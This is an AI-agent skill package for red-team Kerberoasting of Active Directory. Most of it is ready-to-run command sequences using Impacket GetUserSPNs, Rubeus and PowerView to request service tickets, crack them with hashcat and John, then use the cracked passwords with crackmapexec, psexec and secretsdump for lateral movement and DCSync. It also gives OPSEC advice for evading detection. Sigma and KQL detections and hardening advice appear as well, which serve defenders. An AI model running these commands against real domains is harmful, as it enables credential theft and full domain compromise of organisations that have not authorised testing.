What it does. Performs Kerberoasting (MITRE ATT&CK T1558.003) using Impacket's GetUserSPNs.py to request Kerberos TGS tickets for SPN-registered service accounts, then cracks the extracted RC4/AES-encrypted hashes offline to recover service account credentials. Use during authorized Active Directory penetration tests or red-team engagements for credential access against service accounts via Kerberos ticket-granting-service requests. Part of mukul975/Anthropic-Cybersecurity-Skills (817 security skills) (mukul975/Anthropic-Cybersecurity-Skills).
Install
npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-kerberoasting-with-impacket, or copy the skill folder into ~/.claude/skills/exploiting-kerberoasting-with-impacket/.
- Raw file:
curl -sL https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/HEAD/skills/exploiting-kerberoasting-with-impacket/SKILL.md
SKILL.md (verbatim)
name: exploiting-kerberoasting-with-impacket
description: >-
Performs Kerberoasting (MITRE ATT&CK T1558.003) using Impacket's GetUserSPNs.py
to request Kerberos TGS tickets for SPN-registered service accounts, then cracks
the extracted RC4/AES-encrypted hashes offline to recover service account
credentials. Use during authorized Active Directory penetration tests or
red-team engagements for credential access against service accounts via
Kerberos ticket-granting-service requests.
domain: cybersecurity
subdomain: red-teaming
tags:
- kerberoasting
- impacket
- active-directory
- credential-access
- kerberos
- t1558-003
- service-accounts
version: '1.0'
author: mahipal
license: Apache-2.0
d3fend_techniques:
- Application Protocol Command Analysis
- Network Isolation
- Network Traffic Analysis
- Client-server Payload Profiling
- Network Traffic Community Deviation
nist_csf:
- ID.RA-01
- GV.OV-02
- DE.AE-07
mitre_attack:
- T1595
- T1190
- T1059
- T1078
- T1003
Exploiting Kerberoasting with Impacket
Overview
Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's GetUserSPNs.py is the standard tool for Linux-based Kerberoasting attacks.
When to Use
- When performing authorized security testing that involves exploiting kerberoasting with impacket
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding
Prerequisites
- Valid domain credentials (any domain user can request TGS tickets)
- Network access to a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
- Impacket installed (
pip install impacket)
- Hashcat or John the Ripper for offline cracking
- Wordlist (e.g., rockyou.txt, SecLists)
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
| Technique ID |
Name |
Tactic |
| T1558.003 |
Steal or Forge Kerberos Tickets: Kerberoasting |
Credential Access |
| T1087.002 |
Account Discovery: Domain Account |
Discovery |
| T1110.002 |
Brute Force: Password Cracking |
Credential Access |
Step 1: Enumerate Kerberoastable Accounts
# List all user accounts with SPNs (without requesting tickets)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1
# Output example:
# ServicePrincipalName Name MemberOf PasswordLastSet
# ---------------------------- ---------- -------------------------------- -------------------
# MSSQLSvc/SQL01.corp.local svc_sql CN=Domain Admins,CN=Users,... 2023-01-15 10:30:22
# HTTP/web01.corp.local svc_web CN=Web Admins,CN=Users,... 2024-03-20 14:15:00
# HOST/backup01.corp.local svc_backup CN=Backup Operators,CN=Users,... 2022-06-01 08:45:10
Step 2: Request TGS Tickets
# Request TGS tickets for all Kerberoastable accounts
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
# Request ticket for a specific SPN
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request-user svc_sql
# Output format (hashcat-compatible):
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...
# Save to file for cracking
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile kerberoast_hashes.txt
# Using NTLM hash instead of password (Pass-the-Hash)
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
-dc-ip 10.10.10.1 -request -outputfile hashes.txt
# Request AES tickets (if available)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile hashes.txt
Step 3: Crack TGS Tickets Offline
# Hashcat - RC4 encrypted tickets (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule
# Hashcat - AES-256 encrypted tickets (mode 19700)
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
# Check results
hashcat -m 13100 kerberoast_hashes.txt --show
# $krb5tgs$23$*svc_sql$CORP.LOCAL$...*$...:Summer2024!
Step 4: Validate and Use Cracked Credentials
# Verify cracked credentials
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local
# Check for local admin access
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth
# Use credentials for lateral movement
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local
# If service account is Domain Admin
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm
Rubeus (Windows)
# Kerberoast all accounts
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt
# Request RC4-only tickets (easier to crack)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
# Kerberoast with AES
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt
PowerView (PowerShell)
Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
Targeted Kerberoasting
High-value targets for Kerberoasting:
| Account Type |
Why |
Risk |
| Service accounts in Domain Admins |
Direct path to domain compromise |
Critical |
| SQL service accounts (MSSQLSvc) |
Often have excessive privileges |
High |
| Exchange service accounts |
Access to all email |
High |
| Accounts with AdminCount=1 |
Previously/currently privileged |
High |
| Accounts with old passwords |
More likely to use weak passwords |
Medium |
Detection
Windows Event Logs
Event ID 4769 - Kerberos Service Ticket Request
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
- Monitor for: Single user requesting many TGS tickets in short period
- Monitor for: Service ticket requests from unusual source IPs
Sigma Rule
title: Potential Kerberoasting Activity
status: stable
logsource:
product: windows
service: security
detection:
selection:
EventID: 4769
TicketEncryptionType: '0x17' # RC4
ServiceName|endswith: '$'
filter:
ServiceName: 'krbtgt'
condition: selection and not filter
level: medium
tags:
- attack.credential_access
- attack.t1558.003
Defensive Recommendations
- Use Group Managed Service Accounts (gMSA) - 240-character random passwords, auto-rotated
- Set strong passwords (25+ chars) on all service accounts
- Enable AES-only encryption - Disable RC4 via GPO
- Monitor Event ID 4769 for RC4 TGS requests
- Implement Managed Service Accounts where gMSA is not feasible
- Regular audits - Run BloodHound to identify Kerberoastable accounts
- Protected Users group - Add sensitive service accounts
- Honeypot SPNs - Create decoy accounts with SPNs to detect attacks
References
Other files in this skill
assets/template.md (verbatim)
Kerberoasting Assessment Report Template
Assessment Details
| Field |
Value |
| Engagement ID |
[ID] |
| Domain |
[domain.local] |
| Assessment Date |
YYYY-MM-DD |
| Assessor |
[Name] |
| Tool |
Impacket GetUserSPNs v0.11.0 |
Summary
| Metric |
Value |
| Total Kerberoastable Accounts |
XX |
| Cracked Passwords |
XX |
| Privileged Accounts Cracked |
XX |
| Domain Admin Compromise |
Yes/No |
Kerberoastable Accounts Inventory
| Account |
SPN |
Privileged |
Password Age |
Cracked |
Risk |
| svc_sql |
MSSQLSvc/SQL01:1433 |
DA Member |
365 days |
Yes |
Critical |
| svc_web |
HTTP/WEB01 |
No |
180 days |
Yes |
High |
| svc_backup |
HOST/BACKUP01 |
Backup Ops |
730 days |
No |
High |
| svc_exchange |
exchangeMDB/EX01 |
No |
90 days |
No |
Medium |
Attack Chain
1. Obtained domain credentials: jsmith (compromised via phishing)
2. Enumerated SPNs: GetUserSPNs.py corp.local/jsmith:xxx -dc-ip 10.10.10.1
3. Requested TGS tickets: GetUserSPNs.py ... -request -outputfile hashes.txt
4. Cracked offline: hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
5. Validated credentials: crackmapexec smb DC01 -u svc_sql -p 'cracked_pass'
6. Escalated to DA: svc_sql is member of Domain Admins
7. DCSync: secretsdump.py corp.local/svc_sql:xxx@DC01
Findings
Finding 1: Kerberoastable Domain Admin Service Account
| Field |
Value |
| Severity |
Critical (CVSS 9.8) |
| Account |
svc_sql@corp.local |
| SPN |
MSSQLSvc/SQL01.corp.local:1433 |
| Password Cracked |
Yes (weak password) |
| Impact |
Full domain compromise via DCSync |
| MITRE ATT&CK |
T1558.003 -> T1003.006 |
Remediation:
- Immediately reset svc_sql password to 25+ random characters
- Remove svc_sql from Domain Admins group
- Convert to gMSA:
New-ADServiceAccount -Name svc_sql -DNSHostName sql01.corp.local
- Disable RC4 encryption for this account
Finding 2: Multiple Service Accounts with Weak Passwords
| Field |
Value |
| Severity |
High |
| Accounts |
svc_web, svc_iis |
| Time to Crack |
< 2 hours |
| Impact |
Lateral movement to web servers |
| MITRE ATT&CK |
T1558.003 |
Short-Term (1-2 weeks)
Long-Term (1-3 months)
references/api-reference.md (verbatim)
API Reference: Kerberoasting with Impacket
MITRE ATT&CK T1558.003 — Kerberoasting
Attack Flow
- Authenticate to AD with domain user credentials
- Query LDAP for accounts with SPNs
- Request TGS tickets for those SPNs
- Extract ticket hashes
- Crack offline with wordlist
Impacket — GetUserSPNs.py
Enumerate SPN Accounts
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1
Request TGS Tickets
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 \
-request -outputfile kerberoast.txt
With NTLM Hash
GetUserSPNs.py domain.local/user -hashes :NTLM_HASH -dc-ip 10.10.10.1 -request
$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$...$<hash>
Rubeus — Windows Kerberoasting
Kerberoast All SPNs
Rubeus.exe kerberoast /outfile:hashes.txt
Target Specific User
Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt
RC4 Only (weaker, easier to crack)
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
Hash Cracking
Hashcat
# Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 hashes.txt wordlist.txt
# Kerberos 5 TGS-REP etype 17 (AES-128)
hashcat -m 19600 hashes.txt wordlist.txt
# Kerberos 5 TGS-REP etype 18 (AES-256)
hashcat -m 19700 hashes.txt wordlist.txt
John the Ripper
john --wordlist=wordlist.txt hashes.txt
PowerShell Enumeration
Find SPN Accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} `
-Properties ServicePrincipalName, PasswordLastSet
Request TGS (PowerView)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash
Detection
Event IDs
| Event |
Description |
| 4769 |
Kerberos Service Ticket Request |
| 4770 |
Service Ticket Renewed |
Detection Query
SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17" // RC4
| where ServiceName !endswith "$"
| summarize count() by Account, ServiceName
- Use Group Managed Service Accounts (gMSA)
- Set strong passwords (25+ characters) on SPN accounts
- Enable AES encryption for Kerberos (disable RC4)
- Monitor Event 4769 for anomalous TGS requests
references/standards.md (verbatim)
Standards and References: Kerberoasting with Impacket
MITRE ATT&CK Techniques
Primary Technique
- T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
- Tactic: Credential Access (TA0006)
- Platforms: Windows
- Data Sources: Active Directory (Credential Request), Logon Session (Logon Session Metadata)
- Detection: MITRE DET0157
- T1558 - Steal or Forge Kerberos Tickets (parent)
- T1558.004 - AS-REP Roasting
- T1558.001 - Golden Ticket
- T1558.002 - Silver Ticket
- T1087.002 - Account Discovery: Domain Account
- T1110.002 - Brute Force: Password Cracking
APT Groups Known to Use Kerberoasting
- APT29 (Cozy Bear / MITRE G0016)
- FIN7 (MITRE G0046)
- Wizard Spider (MITRE G0102)
- HAFNIUM (MITRE G0125)
- Sandworm Team (MITRE G0034)
NIST References
- NIST SP 800-53 Rev. 5 - IA-5: Authenticator Management (strong service account passwords)
- NIST SP 800-53 Rev. 5 - AC-6: Least Privilege (service account permissions)
- NIST SP 800-63B - Digital Identity Guidelines (password complexity)
- NIST SP 800-171 - 3.5.7: Store and transmit only cryptographically-protected passwords
Windows Security Events
| Event ID |
Description |
Relevance |
| 4769 |
A Kerberos service ticket was requested |
Primary detection (check Encryption Type) |
| 4768 |
A Kerberos authentication ticket (TGT) was requested |
Correlate with source of TGS requests |
| 4770 |
A Kerberos service ticket was renewed |
Renewal of Kerberoasted tickets |
| 4771 |
Kerberos pre-authentication failed |
Related: AS-REP Roasting detection |
Kerberos Encryption Types
| Etype Value |
Algorithm |
Crackable |
Hashcat Mode |
| 0x17 (23) |
RC4-HMAC |
Fast cracking |
13100 |
| 0x11 (17) |
AES128-CTS-HMAC-SHA1-96 |
Slower cracking |
19600 |
| 0x12 (18) |
AES256-CTS-HMAC-SHA1-96 |
Slowest cracking |
19700 |
CIS Benchmarks
- CIS Microsoft Windows Server 2022 - 2.3.6.4: Network security: Configure encryption types for Kerberos
- CIS Active Directory - Service account management requirements
- CIS Controls v8 - Control 5.4: Restrict Administrator Privileges to Dedicated Accounts
references/workflows.md (verbatim)
Workflows: Kerberoasting with Impacket
Kerberoasting Attack Workflow
┌─────────────────────────────────────────────────────────────────┐
│ KERBEROASTING ATTACK WORKFLOW │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. ENUMERATE SPN ACCOUNTS │
│ ├── GetUserSPNs.py (list mode, no -request) │
│ ├── Identify high-value targets (DA members, AdminCount) │
│ ├── Check password age (older = weaker) │
│ └── Prioritize targets │
│ │
│ 2. REQUEST TGS TICKETS │
│ ├── GetUserSPNs.py -request -outputfile hashes.txt │
│ ├── Target specific high-value accounts first │
│ ├── Request RC4 tickets if possible (faster cracking) │
│ └── OPSEC: Space out requests to avoid detection │
│ │
│ 3. OFFLINE CRACKING │
│ ├── hashcat -m 13100 (RC4) or -m 19700 (AES256) │
│ ├── Use quality wordlists (rockyou, SecLists) │
│ ├── Apply rules (best64, dive, OneRuleToRuleThemAll) │
│ └── Use GPU acceleration for faster results │
│ │
│ 4. VALIDATE CREDENTIALS │
│ ├── CrackMapExec SMB validation │
│ ├── Check access levels (local admin, domain admin) │
│ ├── Enumerate additional access paths │
│ └── Document findings │
│ │
│ 5. LEVERAGE ACCESS │
│ ├── If Domain Admin: DCSync / Golden Ticket │
│ ├── If Local Admin: Dump LSASS, pivot laterally │
│ ├── If standard user: Use for further enumeration │
│ └── Update BloodHound with newly owned accounts │
│ │
└─────────────────────────────────────────────────────────────────┘
Target Prioritization Matrix
Priority Decision Tree
│
├── Is account in Domain Admins group?
│ └── YES → CRITICAL priority → Crack immediately
│
├── Is AdminCount = 1?
│ └── YES → HIGH priority → Currently or previously privileged
│
├── Password last set > 2 years ago?
│ └── YES → HIGH priority → Likely weak/legacy password
│
├── Is account AdminTo any computers?
│ └── YES → MEDIUM priority → Lateral movement opportunity
│
├── Account description contains password hint?
│ └── YES → HIGH priority → Common OPSEC failure
│
└── Standard service account
└── LOW priority → Crack opportunistically
Hashcat Command Reference
# Basic Kerberoasting crack (RC4)
hashcat -m 13100 hashes.txt wordlist.txt
# With rules
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule
# Multiple wordlists with rules
hashcat -m 13100 hashes.txt wordlist1.txt wordlist2.txt \
-r rules/OneRuleToRuleThemAll.rule
# AES-256 cracking
hashcat -m 19700 hashes.txt wordlist.txt -r rules/best64.rule
# Brute force (8 chars)
hashcat -m 13100 hashes.txt -a 3 ?a?a?a?a?a?a?a?a
# Show cracked passwords
hashcat -m 13100 hashes.txt --show
Detection and Response Workflow
SOC DETECTION WORKFLOW
│
├── SIEM Alert: Multiple 4769 events with RC4 encryption
│ ├── Check source account - is it a service account?
│ │ └── NO → Potential Kerberoasting
│ ├── Check volume - more than 5 TGS requests in 5 minutes?
│ │ └── YES → High confidence Kerberoasting
│ └── Check encryption type - 0x17 (RC4)?
│ └── YES → Confirm Kerberoasting attempt
│
├── RESPONSE ACTIONS
│ ├── Identify source IP and user account
│ ├── Isolate source system if compromised
│ ├── Reset passwords on all targeted service accounts
│ ├── Check for lateral movement from source
│ └── Review service account permissions
│
└── POST-INCIDENT
├── Implement gMSA for targeted accounts
├── Disable RC4 encryption via GPO
├── Deploy Kerberoasting detection rule
└── Conduct AD security assessment
Back to mukul975/Anthropic-Cybersecurity-Skills (817 security skills) or Agent skills.